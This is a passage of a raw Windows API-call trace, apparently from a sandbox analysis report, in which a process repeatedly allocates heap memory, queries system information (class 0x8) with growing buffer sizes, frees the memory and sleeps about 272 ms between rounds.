lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.176] Sleep (dwMilliseconds=0x110) [0218.189] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0218.189] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0218.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0218.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.191] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0218.191] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0218.192] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.192] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0218.192] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.192] Sleep (dwMilliseconds=0x110) [0218.203] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0218.203] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.204] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.204] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0218.204] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0218.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.206] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0218.206] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0218.207] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.207] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0218.208] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.208] Sleep (dwMilliseconds=0x110) [0218.219] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0218.219] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0218.221] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.222] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.226] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0218.226] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.227] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.228] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0218.228] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0218.229] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.229] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0218.230] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.230] Sleep (dwMilliseconds=0x110) [0218.250] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0218.250] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.251] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.251] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0218.251] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0218.252] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.253] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0218.253] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0218.254] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.254] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0218.254] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.254] Sleep (dwMilliseconds=0x110) [0218.269] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0218.269] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.270] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.270] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0218.270] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.271] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.271] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0218.271] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.272] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.272] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0218.272] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0218.273] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.273] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0218.274] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.274] Sleep (dwMilliseconds=0x110) [0218.297] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0218.297] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.298] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.298] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0218.298] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.302] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.302] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0218.302] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.303] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.303] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0218.303] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0218.304] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.304] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0218.305] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.305] Sleep (dwMilliseconds=0x110) [0218.310] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0218.310] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.311] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.311] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0218.311] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.311] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.311] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0218.311] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.312] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.312] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0218.313] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0218.313] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.313] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0218.314] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.314] Sleep (dwMilliseconds=0x110) [0218.326] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0218.326] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.327] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.327] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0218.327] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.328] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.328] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0218.328] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.329] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.329] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0218.329] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0218.330] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0218.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.331] Sleep (dwMilliseconds=0x110) [0218.342] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0218.342] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.343] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.343] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0218.343] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.347] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.347] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0218.347] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.348] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.348] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0218.348] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0218.349] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.349] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0218.349] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.349] Sleep (dwMilliseconds=0x110) [0218.357] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0218.357] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.357] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.357] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0218.357] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.358] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.358] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0218.358] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.359] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.359] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0218.359] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0218.360] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.360] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0218.361] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.361] Sleep (dwMilliseconds=0x110) [0218.374] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0218.374] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.375] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.375] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0218.375] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0218.376] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.377] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0218.377] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0218.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0218.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.378] Sleep (dwMilliseconds=0x110) [0218.393] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0218.393] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.393] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.393] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0218.393] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.394] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.394] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0218.394] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.395] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.395] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0218.395] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0218.396] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.396] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0218.396] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.396] Sleep (dwMilliseconds=0x110) [0218.407] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0218.407] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.408] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.408] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0218.408] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.408] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.408] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0218.408] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.410] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0218.410] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0218.411] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.411] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0218.411] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.411] Sleep (dwMilliseconds=0x110) [0218.433] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0218.433] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.434] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.434] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0218.434] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.435] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.435] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0218.435] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0218.435] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0218.436] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0218.436] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0218.436] HeapFree (in: 